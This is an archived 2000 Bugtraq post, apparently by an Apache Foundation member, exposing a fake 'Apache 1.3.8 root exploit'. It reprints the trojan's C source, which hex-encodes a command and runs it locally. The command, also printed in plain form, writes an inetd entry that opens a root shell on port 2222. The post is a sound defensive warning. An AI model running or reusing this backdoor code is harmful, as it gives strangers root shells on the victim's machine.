The OpenNET Project / Index page
don't run random "exploit" code
Date: Tue, 8 Feb 2000 14:55:48 -0700
From: Marc Slemko <marcs@ZNEP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: don't run random "exploit" code

-----BEGIN PGP SIGNED MESSAGE-----

Below is some code that I have seen a number of times, with some
very slight variations, over the past few months.  I have no idea
how many people have been tricked by it.  This does not exploit
any hole in Apache, period.  As a simple inspection shows you, it
will run:

echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h

on the local machine.  If you try this "exploit" as root, it will
certainly try to compromise your machine.  But not remotely, and it
has nothing to do with Apache or any bug other than the "bug" of
admins running random code as root.

I know this should be too obvious to have to say and should be no news to
anyone here, but: do not run random supposed exploits as root on your box
without knowing what they do.  Do not even run them as a non-root UID
unless it is a throwaway UID (better yet, a throwaway box) and you have
examined what the program does.  This obviously applies to things posted
to bugtraq but, even more so, to "secret" exploits you may find or be
sent.

Again: the below code has nothing to do with any supposed security hole
in Apache.

To top it all off, in this case there is the fact that there was never
an Apache 1.3.8 released to exploit.  Apache went from 1.3.6 to
1.3.9.

I am posting this to chop off any rumors of a "secret" Apache root exploit
at the knees as well as to give people an example of why they shouldn't do
silly things.

Thanks.


/* remote apache 1.3.8 root exploit (linux) */
/* Annotation: as the post explains, this is not an exploit at all.  The
   "shellcode" below is plain ASCII for the shell command quoted above, and
   main() hands it to /bin/sh on the machine that runs this program, not on
   the target.  The code is left exactly as circulated so the trick can be
   studied. */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Hex-escaped so it does not look like a command at a glance; decoded it is:
   echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h */
char shellcode[] = \
         "\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
         "\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
         "\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
         "\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
         "\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
         "\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";


/* These constants are window dressing: NOP and OFFSET are never used, and
   nothing in the buffer depends on ADDR. */
#define NOP     0x90
#define BSIZE   256
#define OFFSET  400
#define ADDR    0xbffff658
#define ASIZE   2000

int
main(int argc, char *argv[])
{
        char *buffer;
        int s;
        struct hostent *hp;
        struct sockaddr_in sin;
        if (argc != 2) {
                printf("%s <target>\n", argv[0]);
                exit(1);
        }
        /* The buffer is never filled with NOPs or an address; most of it is
           whatever malloc() returned, followed by a stray ';'. */
        buffer = (char *) malloc(BSIZE + ASIZE + 100);
        if (buffer == NULL) {
                printf("Not enough memory\n");
                exit(1);
        }
        memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
                strlen(shellcode));
        buffer[BSIZE + ASIZE] = ';';
        buffer[BSIZE + ASIZE + 1] = '\0';
        hp = gethostbyname(argv[1]);
        if (hp == NULL) {
                printf("no such server\n");
                exit(1);
        }
        bzero(&sin, sizeof(sin));
        bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s < 0) {
                printf("Can't open socket\n");
                exit(1);
        }
        if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
                printf("Connection refused\n");
                exit(1);
        }
        printf("sending exploit code...\n");
        /* send() returns a byte count, so this is never 1: the "successful"
           message is printed no matter what the target does. */
        if (send(s, buffer, strlen(buffer), 0) != 1)
                printf("exploit was successful!\n");
        else
                printf("sorry, this site isn't vulnerable\n");
        printf("waiting for shell.....\n");
        /* Here is the actual payload: the "shellcode" is run as a shell
           command on the local machine, with whatever privileges the user
           who launched this program has. */
        if (fork() == 0)
              execl("/bin/sh", "sh", "-c", shellcode, 0);
        else
                wait(NULL);
        /* Busy-loops forever; there is no remote shell to wait for. */
        while (1) { /* shell */ }
}



--
     Marc Slemko     | Apache Software Foundation member
     marcs@znep.com  | marc@apache.org

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOKCQ51Qv/g4Arev1AQEsqwP/Rs5+WrJtuTavrvpPh2Fwfc5twpYVDTrh
mlLUYzfReB8T0gUDgjr5/SEO/KDcn/i+qwQ8V7y5XWqRLUx4j+QVZNW+HIzQnoH3
6cbqIUT1vH49fMQIO/5tsuYvFlRX+sN/HIILTtVlc32Ok9TOBapiRTfSl29tROjS
SolcNQONdyk=
=6HcL
-----END PGP SIGNATURE-----

Created 1996-2003 by Maxim Chirkov